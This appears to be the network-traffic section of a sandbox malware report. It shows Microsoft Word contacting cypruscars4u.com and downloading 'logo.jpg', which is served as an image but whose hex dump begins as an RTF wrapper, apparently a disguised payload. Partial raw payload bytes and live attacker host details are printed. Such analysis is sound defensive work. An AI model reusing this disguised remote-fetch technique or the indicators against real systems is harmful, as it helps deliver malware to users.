Mai 25, 2018 16:04:05.503052950 MESZ	2	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:05 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.16	49190	87.247.241.143	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:04:14.563160896 MESZ	3	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:04:14.686031103 MESZ	4	IN	HTTP/1.1 302 Found Date: Fri, 25 May 2018 14:04:14 GMT Server: Apache Location: http://cypruscars4u.com/wordpress Content-Length: 217 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress">here</a>.</p></body></html>
Mai 25, 2018 16:04:14.687855959 MESZ	4	OUT	OPTIONS /wordpress HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:04:14.754057884 MESZ	4	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 25 May 2018 14:04:14 GMT Server: Apache Location: http://cypruscars4u.com/wordpress/ Content-Length: 242 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress/">here</a>.</p></body></html>
Mai 25, 2018 16:04:14.758125067 MESZ	5	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:04:14.821834087 MESZ	5	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:04:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:04:14.823277950 MESZ	5	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:04:14.905404091 MESZ	6	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:04:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:04:14.912440062 MESZ	6	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:04:14.987792015 MESZ	7	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:04:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:04:14.989383936 MESZ	7	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:04:15.065145969 MESZ	8	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:04:15.266997099 MESZ	8	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.1.16	49191	87.247.241.143	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:04:15.348134995 MESZ	9	OUT	GET /logo.jpg HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) Accept-Encoding: gzip, deflate Host: cypruscars4u.com Connection: Keep-Alive
Mai 25, 2018 16:04:15.444607019 MESZ	10	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 7b 5c 72 74 66 31 7b 5c 70 69 63 74 5c 6a 70 65 67 62 6c 69 70 5c 70 69 63 77 32 34 5c 70 69 63 68 32 34 5c 62 69 6e 31 35 35 35 30 20 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 20 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 07 06 05 03 04 08 02 01 ff c4 00 57 10 00 01 03 03 02 03 04 04 06 0e 06 05 0a 07 00 00 01 00 02 03 04 05 11 06 21 07 12 31 13 41 51 61 22 71 81 91 14 32 36 74 a1 b2 15 23 42 52 62 72 73 82 92 a2 b1 b3 c1 d1 16 24 33 34 55 c2 17 35 45 54 d2 25 26 43 63 83 93 94 a3 e1 f0 37 44 53 64 84 a4 e2 ff c4 00 1a 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 01 06 ff c4 00 38 11 00 02 02 02 00 04 03 05 06 05 04 03 01 00 00 00 00 01 02 03 04 11 05 12 21 31 13 41 51 22 32 61 81 f0 14 71 91 a1 b1 d1 33 34 c1 e1 f1 15 23 24 42 35 43 44 82 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 bf a2 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 fc 49 23 21 89 f2 ca f6 b2 36 02 e7 3d c7 01 a0 75 24 f7 04 07 ed 16 02 f9 c5 3b 6d 0b 9d 0d aa 17 5c 25 19 1d ae 79 22 07 c8 f5 77 b0 60 f8 ac 15 cf 5f ea 3b 89 77 3d c8 d2 46 7a 32 94 76 40 7e 77 c6 fa 55 b1 a6 4c e7 5d c4 e8 a9 e9 3d bf 81 7b 73 9a c6 97 38 80 07 52 4a f5 8d ca 84 3b 94 d6 d3 03 e1 da b7 3f b5 7c f2 cb 5d ea ee 7b 76 50 5c 6b 79 bf e9 4c 4f 90 1f ce 2b db 1a 23 51 39 bc c2 c5 51 8f 36 b4 1f 76 54 fc 14 bb c8 cf fe a9 64 bd ca 9f d7 c8 fa 0a 39 63 95 bc d1 bd af 6f 8b 4e 57 ed 7c e3 2e 9c be 50 93 23 ec f7 08 79 77 e7 6c 0e c0 f6 b5 7b 36 fd 65 a8 6d af c5 3d de a1 c0 6c 63 a8 77 6a 3d 58 76 48 f6 61 3c 0f 46 17 17 49 ea c8 35 f5 f2 3e 85 45 32 b2 f1 66 37 b9 b1 5e e8 fb 1c 9c 7c 22 94 17 34 7a d8 77 03 d4 4f a9 51 28 6b e9 2e 74 ac aa a1 a9 8a a2 07 f4 7c 6e c8 f5 79 1f 25 4c a1 28 f7 3a 34 65 55 7a dd 6f 67 b2 88 8a 26 80 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 8b 9d 7b bc d2 Data Ascii: {\rtf1{\pict\jpegblip\picw24\pich24\bin15550 JFIFHHDuckydC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222 "W!1AQa"q26t#BRbrs$34U5ET%&Cc7DSd8!1AQ"2aq34#$B5CD?"" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """I#!6=u$;m\%y"w`_;w=Fz2v@~wUL]={s8RJ;?\|]{vP\kyLO+#Q9Q6vTd9coNW\|.P#ywl{6em=lcwj=XvHa<FI5>E2f7^\|"4zwOQ(k.t\|ny%L(:4eUzog&" """ """ """ """ """ {
Mai 25, 2018 16:04:15.444644928 MESZ	12	IN	Data Raw: 58 2d 53 5c 2b 5f 88 e3 18 6b 47 c6 91 c7 a3 5b e6 7f f5 e8 11 2d 9e 4a 4a 2b 6f b1 e3 bf 6a 0b 7e 9c a0 35 75 f2 10 09 c4 71 33 77 c8 ef 06 8f fd 81 de a2 5a 8f 56 5d 35 45 40 6d 43 8c 74 bc ff 00 6a a3 88 92 dc f7 67 bd ee ff 00 d8 01 7a f7 1b Data Ascii: X-S\+_kG[-JJ+oj~5uq3wZV]5E@mCtjgzVcG>UoGZM8UTwYw7S6ZRKoqW1{#)!hg<nOiV;'+[m ><EL:0{+EI,j9F>fs47
Mai 25, 2018 16:04:15.444658995 MESZ	12	IN	Data Raw: 92 56 f7 b9 b9 dc 63 bc 1f 2d ce f8 fd 71 16 f5 71 b1 58 69 aa 6d 95 1d 84 cf ab 6c 6e 77 23 5f 96 96 3c e3 0e 07 bc 05 0e 47 cd ca 6b fb 55 6e 97 72 ea 8d 7a 28 7c 1c 50 d4 74 f4 b2 c7 2c f4 d3 ca f2 39 26 96 20 0c 63 1b 80 1b 80 7b ba af 45 fc Data Ascii: Vc-qqXimlnw#_<GkUnrz(\|Pt,9& c{E@pyca$b\|^m&_Kt~182:4x`216)q>f?;#u.Vl.jvN).zhkZi!s;78a#pi'{sn_jS;up'bnK
Mai 25, 2018 16:04:15.445514917 MESZ	14	IN	Data Raw: b7 cd 4d 0b 65 67 35 25 18 13 ca 08 c8 76 0f a2 d3 eb 3b e0 f5 0d 2a da 52 49 cd 98 78 95 92 b2 71 c6 87 77 dc a0 70 ef 48 8b 35 bc 5d 2b 63 22 e3 54 cd 9a e1 bc 11 9e 8d f5 9d 89 f6 0e ed f7 28 b9 77 fb f5 1e 9c b5 ba e1 5a 24 74 61 cd 63 59 13 Data Ascii: Meg5%v;*RIxqwpH5]+c"T(wZ$tacYr8T-^=\GQMYgu%`wH]=2HdktPI3j!918ZG7/1v,U6FRb ypEl-vx gl"h
Mai 25, 2018 16:04:15.447355986 MESZ	15	IN	Data Raw: c7 ec 9e 8e b6 ce e3 99 19 17 62 fd f2 79 99 e8 e4 fa f1 9f 6a 8e ea aa 89 2f ba da bf b0 1c cf 96 a8 52 c2 01 ce 70 44 63 1e b2 33 ed 5a 6e 1e 6a 11 6b d3 9a 82 37 b9 b9 a4 8c d6 44 d7 7d d1 2d e5 23 de d6 fe 92 e1 70 f2 dc 6e 1a ce 8b 9c 73 b2 Data Ascii: byj/RpDc3Znjk7D}-#pns:L`sJcSRt@(F!e0x8p[~N&Yc?]eiq}\|~LV{".&_JUEyBR..6wU"g}e}iKr6A*]/;
Mai 25, 2018 16:04:15.447390079 MESZ	17	IN	Data Raw: 24 dd 7c bc ad 92 70 cc f1 dd d0 86 9b 3c fc 5d af 32 5c ed d6 e1 9e 58 a2 74 ee df a9 71 e5 1e e0 d7 7b d7 7f 85 56 d1 4b a6 24 ae 73 47 69 5b 33 9c 1d f8 0c f4 40 f7 87 1f 6a c1 f1 1e 67 49 ae ab c3 8e 44 4c 89 8d f2 1c 81 df b5 c5 57 74 95 3b Data Ascii: $\|p<]2\Xtq{VK$sGi[3@jgIDLWt;it}&FsCJ}HL&Z0GZ7%EnWOUAg=sC6pz@0F[NHs^IDT\|vkcd1v\H;7s_HF
Mai 25, 2018 16:04:15.447398901 MESZ	17	IN	Data Raw: 03 d8 ba fa 57 4e 3b 4c 5b a5 a1 15 f2 55 c2 e9 4c 8c e7 60 6f 26 Data Ascii: WN;L[UL`o&
Mai 25, 2018 16:04:15.456495047 MESZ	18	IN	Data Raw: 46 e0 60 f4 ce fe d2 ad 9d 8a 49 35 dd 1c fc 5c 3b 6a 9c eb 92 f6 24 45 b4 cd fa 6d 31 7d 65 70 89 cf 68 0e 86 78 4f a2 e2 d2 77 1b f4 20 80 7d 98 55 98 38 97 a5 a5 85 af 92 ba 48 1c 7a c7 25 3c 9c c3 f4 41 1e e2 bf 7a 8b 40 5a 35 04 ee aa 3d a5 Data Ascii: F`I5\;j$Em1}ephxOw }U8Hz%<Az@Z5=%c4c?\|\zNm\Ytd7p)GS8^L4W8ryn54SRX"i ~Bf,&I}vmeip BOW4Jhc,c.?GRa
Mai 25, 2018 16:04:15.456512928 MESZ	20	IN	Data Raw: d0 52 98 6d 06 06 5a e5 a7 7c ae 9e 9d d2 b1 cf 6c 9e 8f 69 cd 90 72 e1 8c 1e 5c 3b 7e fc 77 ee 1a da 7a fd 0d 0d ee 18 1d 05 45 3d c1 90 d4 d3 f3 7a 12 63 e3 30 ed f1 5c d2 3a 8d 8f 8e 16 22 ba b7 4c d7 6a 8a 6b 93 6d 55 30 da dd 18 92 a6 92 38 Data Ascii: RmZ\|lir\;~wzE=zc0\:"LjkmU089.9qif_\~m9;Hw$x8s4}b.6CCKCPYH81v$4G{XZj}v2'NI7CijfcCji[qG$!mr2
Mai 25, 2018 16:04:15.456527948 MESZ	20	IN	Data Raw: 8d e4 04 0c 00 00 ea 06 e7 73 d7 f5 a4 26 b6 dd b8 87 03 ad 16 f6 51 50 50 52 48 e8 9b ca 04 92 12 43 4b 9e 77 24 fa 5b 64 9c 01 e6 b0 d5 90 dc 6b 6b ea 6a df 6e a8 63 e7 95 f2 b9 ac a7 78 6b 4b 89 38 1b 74 dd 54 b8 5a ca 56 da 2a 19 f6 32 4a 5b Data Ascii: s&QPPRHCKw$[dkkjncxkK8tTZV*2J[Oy16zvl$s~<Hf;V0ws{B(>m$(H;8&UQ9Y_ZAa.w;=?b,=z-=mJ/-4p
Mai 25, 2018 16:04:15.457494020 MESZ	21	IN	Data Raw: 77 78 e6 ef c7 8a 84 a0 e3 dc d3 56 4d 57 36 ab 7b d1 9b e2 25 d1 f6 bd 1d 55 d9 38 b6 5a a2 29 9a 47 77 37 c6 fd 50 e5 28 d1 76 48 ef da a2 9a 8e 66 73 52 c6 0c d3 b4 77 b1 b8 db d4 49 68 3e 44 ad e7 17 a4 22 cb 6d 8f 7e 57 55 17 1f 63 1d fc d7 Data Ascii: wxVMW6{%U8Z)Gw7P(vHfsRwIh>D"m~WUcRQ{^Cr2%k,cX45e;KNUm401HvFS{_iURsg-h=].,\|W,~T\|v8bt,Gj.>7
Mai 25, 2018 16:04:15.546453953 MESZ	67	OUT	HEAD /logo.jpg HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: cypruscars4u.com Content-Length: 0 Connection: Keep-Alive
Mai 25, 2018 16:04:15.652585030 MESZ	67	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
